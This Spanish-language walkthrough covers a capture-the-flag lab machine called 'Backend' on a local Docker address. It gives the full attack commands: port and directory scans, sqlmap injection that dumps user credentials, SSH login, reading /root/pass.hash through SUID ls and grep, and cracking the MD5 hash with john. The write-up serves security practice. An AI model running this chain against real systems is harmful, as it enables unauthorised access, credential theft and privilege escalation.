Backend

✍️ Autor: 4bytes🔍 Dificultad: Fácil 📅 Fecha de creación: 29/08/2024

🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

ping -c 1 172.17.0.2

para verificar la conectividad de red.

A continuación, realizamos el comando:

nmap -sVC -p- -n --min-rate 5000 172.17.0.2

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo que el puerto 22 perteneciente al servicio SSH y el puerto 80 perteneciente al servicio HTTP están abiertos por lo que a continuación se indagará más.

🔎 EXPLORACIÓN

Se utiliza el comando:

sudo nmap -sCV -p22,80 -v 172.17.0.2

para obtener más información sobre esos puertos específicamente.

Seguimos indagando más sobre los puertos y ahora indagamos sobre el servicio HTTP. Se ingresó la dirección IP en el navegador lo que llevó a que la página web sea una página bajo desarrollo podemos ver que hay una pestaña de Login.

Ahora buscaremos directorios y archivos con la herramienta Gobuster a través de:

gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html,txt,php,xml

Probamos con credenciales básicas y con una inyección básica pero nada.

🚀 EXPLOTACIÓN

Vamos a probar con sqlmap para ver que bases de datos hay.

sqlmap -u "http://172.17.0.2/login.html" --forms --batch --dbs

Ahora vemos el contenido de la base de datos users.

sqlmap -u "http://172.17.0.2/login.html" --forms --batch -D users --tables

Ahora vemos el contenido de la tabla de usuarios.

sqlmap -u "http://172.17.0.2/login.html" --forms --batch -D users -T usuarios --dump

Probamos con esas credenciales pero con pepe logramos loguearnos en SSH.

ssh pepe@172.17.0.2

🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

whoami

aún no somos root, por lo que hacemos:

sudo -l

para ver si hay algo para explotar. No tenemos permisos SUDO.

Buscamos permisos SUID.

find / -perm -4000 2>/dev/null

Nos llama la atención ls y grep por lo que buscamos en esta página cómo explotarlo.

/usr/bin/ls -la /root
/usr/bin/grep '' /root/pass.hash

Vemos que es un hash en formato MD5 por lo que vamos a desencriptarlo.

john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5

Nos logueamos como root.

PreviousMirameNextParadise

Last updated

Was this helpful?